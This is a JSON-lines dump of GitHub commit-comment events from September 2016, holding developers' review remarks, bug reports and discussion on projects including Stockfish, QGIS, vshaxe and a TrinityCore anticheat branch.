{"id":"4513699974","type":"CommitCommentEvent","actor":{"login":"Silverwolf90"},"repo":{"name":"Silverwolf90/vexflow"},"payload":{"comment":{"id":18893025,"position":13,"line":490,"path":"src/stavenote.js","commit_id":"e487bdc3191be60156f5412f0053e134562ec771","created_at":"2016-09-04T12:49:20Z","updated_at":"2016-09-04T12:49:20Z","body":"This sucks, but I had to duplicate most of this from `StemmableNote.setStemDirection` since rebuilding the noteheads in a `StaveNote` specific thing."}},"created_at":"2016-09-04T12:49:20Z"}
{"id":"4513702516","type":"CommitCommentEvent","actor":{"login":"NonStopGamePlay"},"repo":{"name":"BigScary/PopulationDensity"},"payload":{"comment":{"id":18893026,"position":null,"line":null,"path":null,"commit_id":"0bd9c4cfd35bea73538604dc91a6cd099c02493a","created_at":"2016-09-04T12:51:24Z","updated_at":"2016-09-04T12:51:24Z","body":"Hello BigScary,\r\n\r\nI've already been on Bukkit left a comment about this plugin, but I is not done much with it so why do I sign again the probleemen about this plugin.\r\n\r\nIf you come to Y256 you can not fly. You should have brought an update but the problem is still there. I prefer that you in the config can enable and disable either or not to spawn at Y256.\r\nWhere do I bother me now suddenly is that if you / spawn do you come out to your home region but if you NewPlayersSpawnInHomeRegion and RespawnInHomeRegion expands. At first it was not but now my players can not do /spawn more because this plugin will override Essentials /spawn command.\r\nI was all by the time this plugin updated because I had a lot of horses and dogs all the time with tpen if you went to a region but from there were all these issues.\r\nI hope this can be fixed it because it's a nice plugin that you handed over to distributable over the map.\r\n\r\nCould it be as you /randomregion do you, for example, X200,500, Y75,500 and Z200,500 can spawn because sometimes NoCheatPlus sees this as hacks because you spawns in a block.\r\n\r\nThank you and hopefully these things can be fefixt because I'm not the only one with this problem.\r\n\r\nMenno\r\n\r\n(Translated by Google translate)"}},"created_at":"2016-09-04T12:51:24Z"}
{"id":"4513702647","type":"CommitCommentEvent","actor":{"login":"bennett-wenger"},"repo":{"name":"bennett-wenger/challenge-201608-refactor"},"payload":{"comment":{"id":18893027,"position":null,"line":null,"path":null,"commit_id":"830c0708c9a0229cc51bed5ce0518a8ba24dc40e","created_at":"2016-09-04T12:51:30Z","updated_at":"2016-09-04T12:51:30Z","body":"I say \"done\" in my initial comment, but I really just mean \"done for now\".\r\nThere's so much more that should be done, just not sure if I'll have the time.\r\nPerhaps later in the month.\r\nBut I am happy with it thus far."}},"created_at":"2016-09-04T12:51:30Z"}
{"id":"4513702910","type":"CommitCommentEvent","actor":{"login":"ntzz1337"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18893028,"position":77,"line":230,"path":"pogom/utils.py","commit_id":"d4c8cf3de738710b041143dd56fbe0a20b717d2d","created_at":"2016-09-04T12:51:43Z","updated_at":"2016-09-04T12:51:43Z","body":"This should be changed to:\r\n`if (len(args.auth_service) == 0):`\r\nto adress issue #1128."}},"created_at":"2016-09-04T12:51:43Z"}
{"id":"4513703508","type":"CommitCommentEvent","actor":{"login":"Alx31"},"repo":{"name":"TeslaRom-N/manifest"},"payload":{"comment":{"id":18893029,"position":null,"line":null,"path":null,"commit_id":"dd34e2913a3af1a7cbc601692cb05ee78a6131ee","created_at":"2016-09-04T12:52:14Z","updated_at":"2016-09-04T12:52:14Z","body":"lmao; stop lying"}},"created_at":"2016-09-04T12:52:14Z"}
{"id":"4513706510","type":"CommitCommentEvent","actor":{"login":"fullwall"},"repo":{"name":"FreneticXYZ/Voxalia"},"payload":{"comment":{"id":18893033,"position":85,"line":70,"path":"Voxalia/bin/Release/data/shaders/finalgodray.fs","commit_id":"64a78f7471ec389083b56a67a3aa467c42738aae","created_at":"2016-09-04T12:54:46Z","updated_at":"2016-09-04T12:54:46Z","body":"Can improve this with clamp(input_r.rgb, 0.0, 1.0)"}},"created_at":"2016-09-04T12:54:46Z"}
{"id":"4513706550","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":18893034,"position":null,"line":null,"path":null,"commit_id":"9b5e164554bd6d697e3fffc3c271e086e1a1ba93","created_at":"2016-09-04T12:54:47Z","updated_at":"2016-09-04T12:54:47Z","body":"это ненужно"}},"created_at":"2016-09-04T12:54:47Z"}
{"id":"4513706731","type":"CommitCommentEvent","actor":{"login":"yangg"},"repo":{"name":"ahonn/hexo-theme-even"},"payload":{"comment":{"id":18893035,"position":4,"line":6,"path":"source/js/theme.js","commit_id":"3d6f5eec48b066c145707b23987d4a70f50c6cec","created_at":"2016-09-04T12:54:56Z","updated_at":"2016-09-04T12:54:56Z","body":"之前 pull request 忘记了，应该是要将 label 换成a标签，body上加个#back2top，才能利用 hash 的跳转，实现 smooth scroll-behavior"}},"created_at":"2016-09-04T12:54:56Z"}
{"id":"4513710051","type":"CommitCommentEvent","actor":{"login":"ahonn"},"repo":{"name":"ahonn/hexo-theme-even"},"payload":{"comment":{"id":18893048,"position":4,"line":6,"path":"source/js/theme.js","commit_id":"3d6f5eec48b066c145707b23987d4a70f50c6cec","created_at":"2016-09-04T12:57:45Z","updated_at":"2016-09-04T12:57:45Z","body":"我发现了。我把这个去掉了。然后重新写了 back to top 部分的 JS。"}},"created_at":"2016-09-04T12:57:45Z"}
{"id":"4513712153","type":"CommitCommentEvent","actor":{"login":"hughperkins"},"repo":{"name":"jaredo/jeigen"},"payload":{"comment":{"id":18893052,"position":null,"line":null,"path":null,"commit_id":"88df1ef86adc2f4323c0fd970f84ceb8d1f79d41","created_at":"2016-09-04T12:59:09Z","updated_at":"2016-09-04T12:59:09Z","body":"Hi Jaredo,\r\n\r\nPlease can you confirm that you/Illumina Inc are ok with explicitly licensing your RandomSVD code as MPL?\r\n\r\nHugh\r\n"}},"created_at":"2016-09-04T12:59:09Z"}
{"id":"4513713053","type":"CommitCommentEvent","actor":{"login":"DanielTimLee"},"repo":{"name":"DanielTimLee/flask_tutorial"},"payload":{"comment":{"id":18893054,"position":null,"line":null,"path":null,"commit_id":"7c322961f34a43e336c71e90f1475520c37edcda","created_at":"2016-09-04T12:59:54Z","updated_at":"2016-09-04T12:59:54Z","body":"requirements.txt에 \r\nPymysql이 빠졌습니다.\r\n\r\n```sh\r\npip install pymysql\r\n```\r\n를 해주세요"}},"created_at":"2016-09-04T12:59:54Z"}
{"id":"4513713325","type":"CommitCommentEvent","actor":{"login":"fullwall"},"repo":{"name":"FreneticXYZ/Voxalia"},"payload":{"comment":{"id":18893055,"position":343,"line":133,"path":"Voxalia/bin/Release/data/shaders/finalgodray.fs","commit_id":"64a78f7471ec389083b56a67a3aa467c42738aae","created_at":"2016-09-04T13:00:06Z","updated_at":"2016-09-04T13:00:06Z","body":"Well... linearizeDepth is only needed if your depth texture is in depth space or not. Exponential fog scaling is up to you but might be nicer"}},"created_at":"2016-09-04T13:00:06Z"}
{"id":"4513715972","type":"CommitCommentEvent","actor":{"login":"yangg"},"repo":{"name":"ahonn/hexo-theme-even"},"payload":{"comment":{"id":18893056,"position":4,"line":6,"path":"source/js/theme.js","commit_id":"3d6f5eec48b066c145707b23987d4a70f50c6cec","created_at":"2016-09-04T13:02:00Z","updated_at":"2016-09-04T13:02:00Z","body":"好吧，我是说后面的JS可以return 掉\r\nOn Sun, Sep 4, 2016 at 8:57 PM Yuexun <notifications@github.com> wrote:\r\n\r\n> 我发现了。我把这个去掉了。然后重新写了 back to top 部分的 JS。\r\n>\r\n> —\r\n> You are receiving this because you commented.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/ahonn/hexo-theme-even/commit/3d6f5eec48b066c145707b23987d4a70f50c6cec#commitcomment-18893048>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AAY-iaCx2YRu2HA2Vo6Zw5lnRVpeE_ODks5qmsBJgaJpZM4J0h4a>\r\n> .\r\n>\r\n"}},"created_at":"2016-09-04T13:02:00Z"}
{"id":"4513715977","type":"CommitCommentEvent","actor":{"login":"Demonid"},"repo":{"name":"Aokromes/TrinityCore"},"payload":{"comment":{"id":18893057,"position":null,"line":null,"path":null,"commit_id":"2fb0418b569985f32cbb5f6fb73826a10bf31e37","created_at":"2016-09-04T13:02:00Z","updated_at":"2016-09-04T13:02:00Z","body":"@Aokromes Disculpa que te moleste por aqui, no queria hacer \"Spam\" en el PR.\r\n\r\nTenia ganas de testear el Anticheat so compile el Branch Passive de este Repo, y si bien tengo activado el Anticheat en el Config (Tambien intente desde el comando) no me esta tomando positivos de ningun tipo de hack.\r\n\r\nQueria pedirte de favor si pudieses echarle un vistazo en tu local, a ver si a ti te esta funcionando o es un problema mio.\r\n\r\nHe probado con este Hack: https://mega.co.nz/#!BcwDxTII!DDjcb8zvJzadv5_6RFxpabs3f5QZW0ruGQSdWYpG2Sk\r\n\r\nGracias!"}},"created_at":"2016-09-04T13:02:00Z"}
{"id":"4513716565","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18893058,"position":null,"line":null,"path":null,"commit_id":"612fd9c3aa02ec4705c1a2242f8e283b5bc23da4","created_at":"2016-09-04T13:02:30Z","updated_at":"2016-09-04T13:02:30Z","body":"this also runs server tests again which is a waste of travis time, so we're gonna need to clean up our hxmls"}},"created_at":"2016-09-04T13:02:30Z"}
{"id":"4513718539","type":"CommitCommentEvent","actor":{"login":"xmcp"},"repo":{"name":"ht35268/bzShare"},"payload":{"comment":{"id":18893061,"position":12,"line":17,"path":"bzs/sqlfs/file_storage.py","commit_id":"98c521902f209056d9c9d7362ec182b01b3332f1","created_at":"2016-09-04T13:04:07Z","updated_at":"2016-09-04T13:04:07Z","body":"just be aware that `sha256` is really time-consuming"}},"created_at":"2016-09-04T13:04:07Z"}
{"id":"4513720705","type":"CommitCommentEvent","actor":{"login":"Aokromes"},"repo":{"name":"Aokromes/TrinityCore"},"payload":{"comment":{"id":18893063,"position":null,"line":null,"path":null,"commit_id":"2fb0418b569985f32cbb5f6fb73826a10bf31e37","created_at":"2016-09-04T13:05:53Z","updated_at":"2016-09-04T13:05:53Z","body":"por desgracia este anticheat esta lejos de ser perfecto, pero detecta unos cuantos hacks que el warden no.\r\ny yo aun no uso este, si no el que mantengo en el foro. (supongo que tendra los mismos problemas)"}},"created_at":"2016-09-04T13:05:53Z"}
{"id":"4513721170","type":"CommitCommentEvent","actor":{"login":"levrik"},"repo":{"name":"Aluxian/Whatsie"},"payload":{"comment":{"id":18893065,"position":37,"line":37,"path":"src/scripts/renderer/preload/profile-picture-download.js","commit_id":"6490cdf519ab35ccce95eeec4d2abd06ae7abf38","created_at":"2016-09-04T13:06:14Z","updated_at":"2016-09-04T13:06:14Z","body":"WhatsApp Web uses `jpeg` as extension for image downloads. I think we should match that behavior."}},"created_at":"2016-09-04T13:06:14Z"}
{"id":"4513722617","type":"CommitCommentEvent","actor":{"login":"ahonn"},"repo":{"name":"ahonn/hexo-theme-even"},"payload":{"comment":{"id":18893070,"position":4,"line":6,"path":"source/js/theme.js","commit_id":"3d6f5eec48b066c145707b23987d4a70f50c6cec","created_at":"2016-09-04T13:07:21Z","updated_at":"2016-09-04T13:07:21Z","body":"其实一开始是用  hash 跳转的。然后嫌 URL 丑才用了 JS 的。。。"}},"created_at":"2016-09-04T13:07:21Z"}
{"id":"4513723140","type":"CommitCommentEvent","actor":{"login":"lindybrandon"},"repo":{"name":"meteor/simple-todos-react"},"payload":{"comment":{"id":18893072,"position":null,"line":null,"path":null,"commit_id":"8cb48d9c1280f5feda7aff06c385a52dedad832d","created_at":"2016-09-04T13:07:50Z","updated_at":"2016-09-04T13:07:50Z","body":"This step is causing an error when I try to run the app:\r\napp.jsx:58 Uncaught TypeError: Cannot read property 'bind' of undefined\r\n\r\nI can't figure out what I've done wrong - my code looks just like yours :-)\r\n\r\n"}},"created_at":"2016-09-04T13:07:50Z"}
{"id":"4513723908","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18893073,"position":null,"line":null,"path":null,"commit_id":"612fd9c3aa02ec4705c1a2242f8e283b5bc23da4","created_at":"2016-09-04T13:08:29Z","updated_at":"2016-09-04T13:08:29Z","body":"Is that really an issue? The build took 42 seconds... It's pretty convenient to have all in the build.hxml so tests are run automatically when rebuilding."}},"created_at":"2016-09-04T13:08:29Z"}
{"id":"4513725306","type":"CommitCommentEvent","actor":{"login":"jfpla"},"repo":{"name":"eLBati/multi-company"},"payload":{"comment":{"id":18893074,"position":null,"line":null,"path":null,"commit_id":"4f1b33daeb24187ff9d035837e94db47a3506d46","created_at":"2016-09-04T13:09:44Z","updated_at":"2016-09-04T13:09:44Z","body":"Ok thanks, works fine for me.\r\n\r\nBut I had an issue with the `pos = self.env['purchase.order'].search(...` on line 26.\r\nIf the company who starts all the operations does it with a sale, and is the one who transfers the picking, that search without sudo() returns no records, since that purchase belongs to the other company. "}},"created_at":"2016-09-04T13:09:44Z"}
{"id":"4513726367","type":"CommitCommentEvent","actor":{"login":"fritsvanveen"},"repo":{"name":"fritsvanveen/QGIS"},"payload":{"comment":{"id":18893075,"position":null,"line":null,"path":null,"commit_id":"fe108f3b8db141573c97004fc6f341d71d94e76e","created_at":"2016-09-04T13:10:36Z","updated_at":"2016-09-04T13:10:36Z","body":"The orientation was based on the angle of the first character, now I'm calculating the angle of the line segment needed for the label. I'd like to refactor the two for loops (which look very alike) to a separate function.\r\nI don't see how we can avoid looping two times here. We first need to establish the right angle, before we can place characters."}},"created_at":"2016-09-04T13:10:36Z"}
{"id":"4513727169","type":"CommitCommentEvent","actor":{"login":"Demonid"},"repo":{"name":"Aokromes/TrinityCore"},"payload":{"comment":{"id":18893076,"position":null,"line":null,"path":null,"commit_id":"2fb0418b569985f32cbb5f6fb73826a10bf31e37","created_at":"2016-09-04T13:11:12Z","updated_at":"2016-09-04T13:11:12Z","body":"@Aokromes He usado por mucho tiempo el Patch que tienes en el Foro, y entiendo mas o menos como funciona, lo que te comentaba es que en el Anticheat del PR, el que han actualizado y/o modificado, no me esta detectando nada. Que si tu podias echarle un vistazo en tu local, por si se rompio algo en la actualizacion de codigo que hace que ya no detecte absolutamente nada o si es problema mio, si me explique mejor esta vez ?"}},"created_at":"2016-09-04T13:11:12Z"}
{"id":"4513727186","type":"CommitCommentEvent","actor":{"login":"yangg"},"repo":{"name":"ahonn/hexo-theme-even"},"payload":{"comment":{"id":18893077,"position":4,"line":6,"path":"source/js/theme.js","commit_id":"3d6f5eec48b066c145707b23987d4a70f50c6cec","created_at":"2016-09-04T13:11:13Z","updated_at":"2016-09-04T13:11:13Z","body":"那也可以使用 window.scrollTo({behavior: \"smooth\", top: 0})\n\nOn Sun, Sep 4, 2016 at 9:07 PM, Yuexun <notifications@github.com> wrote:\n\n> 其实一开始是用 hash 跳转的。然后嫌 URL 丑才用了 JS 的。。。\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ahonn/hexo-theme-even/commit/3d6f5eec48b066c145707b23987d4a70f50c6cec#commitcomment-18893070>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAY-iRmcnV40GQimlvySf7igpDgLbVSaks5qmsKKgaJpZM4J0h4a>\n> .\n>\n"}},"created_at":"2016-09-04T13:11:13Z"}
{"id":"4513727388","type":"CommitCommentEvent","actor":{"login":"misterpaladin"},"repo":{"name":"LaravelRUS/laravel-skeleton"},"payload":{"comment":{"id":18893078,"position":4,"line":7,"path":"app/Console/Commands/IdeHelperRun.php","commit_id":"a57ad6dbc205971a9f8ad7faafbb590e9c7f2b1d","created_at":"2016-09-04T13:11:23Z","updated_at":"2016-09-04T13:11:23Z","body":"Why?"}},"created_at":"2016-09-04T13:11:23Z"}
{"id":"4513729467","type":"CommitCommentEvent","actor":{"login":"jeveloper"},"repo":{"name":"lelandrichardson/react-native-maps"},"payload":{"comment":{"id":18893079,"position":null,"line":null,"path":null,"commit_id":"f0ecffd38c47369e737ef9ba7ba9fc557bc228ec","created_at":"2016-09-04T13:13:04Z","updated_at":"2016-09-04T13:13:04Z","body":"Folks, we're going to lose support for older devices \r\nWhy do this when it doesnt really bring any new features? "}},"created_at":"2016-09-04T13:13:04Z"}
{"id":"4513729692","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18893081,"position":null,"line":null,"path":null,"commit_id":"6e5c07abdd9aa423393e706ff9d8298f4fe42cb8","created_at":"2016-09-04T13:13:16Z","updated_at":"2016-09-04T13:13:16Z","body":"@mstembera @snicolet What do you think about this one? It's just some sample code so I'm unwilling to submit tests before hearing opinions... https://github.com/lucabrivio/Stockfish/compare/master...pawn_groups"}},"created_at":"2016-09-04T13:13:16Z"}
{"id":"4513731653","type":"CommitCommentEvent","actor":{"login":"CarlosArriagaCM"},"repo":{"name":"Hacker432-Y550/android_device_huawei_y550"},"payload":{"comment":{"id":18893082,"position":null,"line":null,"path":null,"commit_id":"19846ebe91502a38c6b24c8659d1a770bb6bebb4","created_at":"2016-09-04T13:14:55Z","updated_at":"2016-09-04T13:14:55Z","body":"with this tree charge the battery to 100%?"}},"created_at":"2016-09-04T13:14:55Z"}
{"id":"4513731803","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18893083,"position":null,"line":null,"path":null,"commit_id":"612fd9c3aa02ec4705c1a2242f8e283b5bc23da4","created_at":"2016-09-04T13:15:04Z","updated_at":"2016-09-04T13:15:04Z","body":"Not really an issue, but current hxml files seem a bit clunky. We could separate them and then combine again in different ways so you run tests on your build, but not on Travis. Not a priority ofc."}},"created_at":"2016-09-04T13:15:04Z"}
{"id":"4513732089","type":"CommitCommentEvent","actor":{"login":"fritsvanveen"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18893084,"position":null,"line":null,"path":null,"commit_id":"34e2bea24635e15e981ef915219b1095f51bbe90","created_at":"2016-09-04T13:15:15Z","updated_at":"2016-09-04T13:15:15Z","body":"@nyalldawson Made another commit on my fork https://github.com/fritsvanveen/QGIS\r\nIk works now, but I want to clean up the code."}},"created_at":"2016-09-04T13:15:15Z"}
{"id":"4513732501","type":"CommitCommentEvent","actor":{"login":"hassanalubeidi"},"repo":{"name":"hassanalubeidi/NSP-Merch"},"payload":{"comment":{"id":18893085,"position":null,"line":null,"path":null,"commit_id":"d5f85dde34d41ce1daf3bb1610f20219d928e38a","created_at":"2016-09-04T13:15:34Z","updated_at":"2016-09-04T13:15:34Z","body":"ffs you love looking through my db seed files don't you"}},"created_at":"2016-09-04T13:15:34Z"}
{"id":"4513732620","type":"CommitCommentEvent","actor":{"login":"gkalen"},"repo":{"name":"Xiaomi-Miui-Hellas/MIUI-XML-8.0-Greek"},"payload":{"comment":{"id":18893086,"position":null,"line":null,"path":null,"commit_id":"11363ee37c069d9265183023d1d1f016249f54db","created_at":"2016-09-04T13:15:41Z","updated_at":"2016-09-04T13:15:41Z","body":"Δεν ξέρω , κι εμένα μου'ρθε το mail αλλά δεν έχω καταλάβει τι πρέπει να\r\nκάνω ..\r\n\r\nΣτις 4 Σεπ 2016 12:55, ο χρήστης \"AndroidCyprus\" <notifications@github.com>\r\nέγραψε:\r\n\r\n> Ok. Which strings need to be translated?\r\n>\r\n> —\r\n> You are receiving this because you are subscribed to this thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/Xiaomi-Miui-Hellas/MIUI-XML-8.0-Greek/commit/11363ee37c069d9265183023d1d1f016249f54db#commitcomment-18892587>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AHdTlj6Din3SWLkxuI-prjXwYe4mHMlFks5qmpWagaJpZM4J0REN>\r\n> .\r\n>\r\n"}},"created_at":"2016-09-04T13:15:41Z"}
{"id":"4513734090","type":"CommitCommentEvent","actor":{"login":"scoder"},"repo":{"name":"1st1/cpython"},"payload":{"comment":{"id":18893087,"position":415,"line":1687,"path":"Objects/genobject.c","commit_id":"fa299fe668ba07141b1791f56b1a37efcaf86344","created_at":"2016-09-04T13:16:48Z","updated_at":"2016-09-04T13:16:48Z","body":"The comment should go into the next initialiser line and this one should say `/* tp_methods */`. This means that there is one `0` value initialiser line missing here, the one for `tp_members`."}},"created_at":"2016-09-04T13:16:48Z"}
{"id":"4513735512","type":"CommitCommentEvent","actor":{"login":"SMundt"},"repo":{"name":"SMundt/iobroker.lgtv"},"payload":{"comment":{"id":18893090,"position":null,"line":null,"path":null,"commit_id":"7af1a1e58cb6d9313451214eaffb874df333aed0","created_at":"2016-09-04T13:17:54Z","updated_at":"2016-09-04T13:17:54Z","body":"Hi @GermanBluefox,\r\n\r\nI get the following error when I try to connect / send a popup message:\r\n\r\n`\r\nlgtv-0\t2016-09-04 15:07:23.407\tinfo\tterminating\r\nTypeError:\t2016-09-04 15:07:22.860\terror\tat Timer.listOnTimeout (timers.js:92:15)\r\nTypeError:\t2016-09-04 15:07:22.860\terror\tat null._onTimeout (C:\\ioBroker\\node_modules\\iobroker.lgtv\\node_modules\\lgtv2\\index.js:288:14)\r\nTypeError:\t2016-09-04 15:07:22.860\terror\tat connect (C:\\ioBroker\\node_modules\\iobroker.lgtv\\node_modules\\lgtv2\\index.js:270:18)\r\nTypeError:\t2016-09-04 15:07:22.860\terror\tat emit (events.js:169:7)\r\nTypeError:\t2016-09-04 15:07:22.860\terror\tat emitOne (events.js:77:13)\r\nTypeError:\t2016-09-04 15:07:22.860\terror\tat null. (C:\\ioBroker\\node_modules\\iobroker.lgtv\\lgtv.js:64:12)\r\nTypeError:\t2016-09-04 15:07:22.860\terror\tat disconnect (C:\\ioBroker\\node_modules\\iobroker.lgtv\\node_modules\\lgtv2\\index.js:277:20)\r\nTypeError:\t2016-09-04 15:07:22.860\terror\tconnection.close is not a function\r\nuncaught\t2016-09-04 15:07:22.860\terror\texception: connection.close is not a function\r\nlgtv-0\t2016-09-04 15:07:22.860\terror\tError on connecting to WebOS TV: ws://192.168.178.60:3000\r\nlgtv-0\t2016-09-04 15:07:19.594\tinfo\tReady. Configured WebOS TV IP: 192.168.178.60\r\nlgtv-0\t2016-09-04 15:07:19.594\tinfo\tstarting. Version 0.0.2 in C:/ioBroker/node_modules/iobroker.lgtv \r\n`\r\n\r\nBut I can't find any mistake at lie 64?!"}},"created_at":"2016-09-04T13:17:54Z"}
{"id":"4513736308","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18893091,"position":null,"line":null,"path":null,"commit_id":"6f772a796ab615ba024d00cb61aad824b9f2c983","created_at":"2016-09-04T13:18:32Z","updated_at":"2016-09-04T13:18:32Z","body":"In line 125, it looks like it would be better to use `DistanceRingBB[s][0]` instead of `pos.attacks_from<KING>(s)`, as there is no king at all in your calculations -- this gives the same bench."}},"created_at":"2016-09-04T13:18:32Z"}
{"id":"4513736669","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"vshaxe/haxe-languageserver"},"payload":{"comment":{"id":18893094,"position":null,"line":null,"path":null,"commit_id":"c8a746e1f98a856f41bfea6a8c58f74fc30d9ad8","created_at":"2016-09-04T13:18:50Z","updated_at":"2016-09-04T13:18:50Z","body":"You don't this it isn't? So you think it is?"}},"created_at":"2016-09-04T13:18:50Z"}
{"id":"4513738417","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18893096,"position":null,"line":null,"path":null,"commit_id":"6f772a796ab615ba024d00cb61aad824b9f2c983","created_at":"2016-09-04T13:20:16Z","updated_at":"2016-09-04T13:20:16Z","body":"Thanks @snicolet I didn't remember that!\n"}},"created_at":"2016-09-04T13:20:16Z"}
{"id":"4513739268","type":"CommitCommentEvent","actor":{"login":"va2ron1"},"repo":{"name":"PrismarineMC/Prismarine"},"payload":{"comment":{"id":18893097,"position":null,"line":null,"path":null,"commit_id":"e7bbf81512d57648dbbfe71d75a4ca4fb0496299","created_at":"2016-09-04T13:20:50Z","updated_at":"2016-09-04T13:20:50Z","body":"I'll look at it tomorrow because I don't computer to work out, but Prismarine already have a packets handler. We only need to fix a few protocols and add anothers from\r\nBigBrother, but not the full plugin. I think..."}},"created_at":"2016-09-04T13:20:50Z"}
{"id":"4513739293","type":"CommitCommentEvent","actor":{"login":"tTrilenko"},"repo":{"name":"tTrilenko/test2"},"payload":{"comment":{"id":18893098,"position":6,"line":7,"path":"testJSON","commit_id":"6a7bd0b17578ac24cd52fa24fbbac89e89d8631e","created_at":"2016-09-04T13:20:52Z","updated_at":"2016-09-04T13:20:52Z","body":"test"}},"created_at":"2016-09-04T13:20:52Z"}
{"id":"4513741051","type":"CommitCommentEvent","actor":{"login":"Clarmy"},"repo":{"name":"Clarmy/Python-Atmospheric-Science"},"payload":{"comment":{"id":18893099,"position":null,"line":null,"path":null,"commit_id":"b23ba95610296bad71a1e3c676538badbd530abe","created_at":"2016-09-04T13:21:52Z","updated_at":"2016-09-04T13:21:52Z","body":"数据的示例文件"}},"created_at":"2016-09-04T13:21:52Z"}
{"id":"4513741344","type":"CommitCommentEvent","actor":{"login":"dpgeorge"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893100,"position":25,"line":87,"path":"extmod/moduzlib.c","commit_id":"1bc5cb4312cae9702ab5fe5412b16156a08b8280","created_at":"2016-09-04T13:22:06Z","updated_at":"2016-09-04T13:22:06Z","body":"@pfalcon I'm a bit confused why you don't use the mp_raise_ValueError function you added... is it just oversight?"}},"created_at":"2016-09-04T13:22:06Z"}
{"id":"4513742165","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"vshaxe/haxe-languageserver"},"payload":{"comment":{"id":18893106,"position":null,"line":null,"path":null,"commit_id":"c8a746e1f98a856f41bfea6a8c58f74fc30d9ad8","created_at":"2016-09-04T13:22:43Z","updated_at":"2016-09-04T13:22:43Z","body":"I should try reading what I type before I hit enter somtimes..."}},"created_at":"2016-09-04T13:22:43Z"}
{"id":"4513743921","type":"CommitCommentEvent","actor":{"login":"Aokromes"},"repo":{"name":"Aokromes/TrinityCore"},"payload":{"comment":{"id":18893109,"position":null,"line":null,"path":null,"commit_id":"2fb0418b569985f32cbb5f6fb73826a10bf31e37","created_at":"2016-09-04T13:24:01Z","updated_at":"2016-09-04T13:24:01Z","body":"No se, como te digo esta version no la uso, de todas formas, mejor irc.rizon.net #trinity-es xd"}},"created_at":"2016-09-04T13:24:01Z"}
{"id":"4513744320","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18893110,"position":null,"line":null,"path":null,"commit_id":"612fd9c3aa02ec4705c1a2242f8e283b5bc23da4","created_at":"2016-09-04T13:24:17Z","updated_at":"2016-09-04T13:24:17Z","body":"Might be worth it sometime in the future when a considerable amount of time is spent on tests.. Let's hope we get to that point! ;D"}},"created_at":"2016-09-04T13:24:17Z"}
{"id":"4513744411","type":"CommitCommentEvent","actor":{"login":"paullj1"},"repo":{"name":"mcpa-stlouis/mcpa-stlouis.github.io"},"payload":{"comment":{"id":18893111,"position":null,"line":null,"path":null,"commit_id":"8c491da8d714296c866264789dd9d604575ab380","created_at":"2016-09-04T13:24:22Z","updated_at":"2016-09-04T13:24:22Z","body":"Are these supposed to go somewhere?"}},"created_at":"2016-09-04T13:24:22Z"}
{"id":"4513744433","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18893112,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T13:24:23Z","updated_at":"2016-09-04T13:24:23Z","body":"Very interesting. \r\nThis pawn_group measure detects the vertical (and horizontal) splits in the pawn chains\r\nIt is much better than the traditional island count which is only looking at horizontal splits.\r\n\r\nAre you really going for 8 * (pawns + 4 * groupDifference); \r\nor your meant 8 * pawns + 4 * groupDifference;\r\n\r\nAlso a simple \r\nint pawngroups = ei.pi->pawn_groups(WHITE) + ei.pi->pawn_groups(BLACK);\r\nmight be interesting too.\r\n"}},"created_at":"2016-09-04T13:24:23Z"}
{"id":"4513744536","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/haxe-languageserver"},"payload":{"comment":{"id":18893113,"position":null,"line":null,"path":null,"commit_id":"c8a746e1f98a856f41bfea6a8c58f74fc30d9ad8","created_at":"2016-09-04T13:24:26Z","updated_at":"2016-09-04T13:24:26Z","body":"For some reason I often skip words... I guess I really can't into English after all :)"}},"created_at":"2016-09-04T13:24:26Z"}
{"id":"4513746733","type":"CommitCommentEvent","actor":{"login":"caspervanneck"},"repo":{"name":"PrismarineMC/Prismarine"},"payload":{"comment":{"id":18893114,"position":null,"line":null,"path":null,"commit_id":"e7bbf81512d57648dbbfe71d75a4ca4fb0496299","created_at":"2016-09-04T13:26:05Z","updated_at":"2016-09-04T13:26:05Z","body":"@va2ron1  thnx im happy dat you wand to help"}},"created_at":"2016-09-04T13:26:05Z"}
{"id":"4513748066","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18893116,"position":null,"line":null,"path":null,"commit_id":"6f772a796ab615ba024d00cb61aad824b9f2c983","created_at":"2016-09-04T13:27:04Z","updated_at":"2016-09-04T13:27:04Z","body":"Btw, does your code make the implicit assumption that the pawns in the list are in the left-to-right order?\r\n\r\nWhat happens if there are 3 pawns in the order  c5, e5, d4 in the pawn list? How maybe groups do you calculate in that case?"}},"created_at":"2016-09-04T13:27:04Z"}
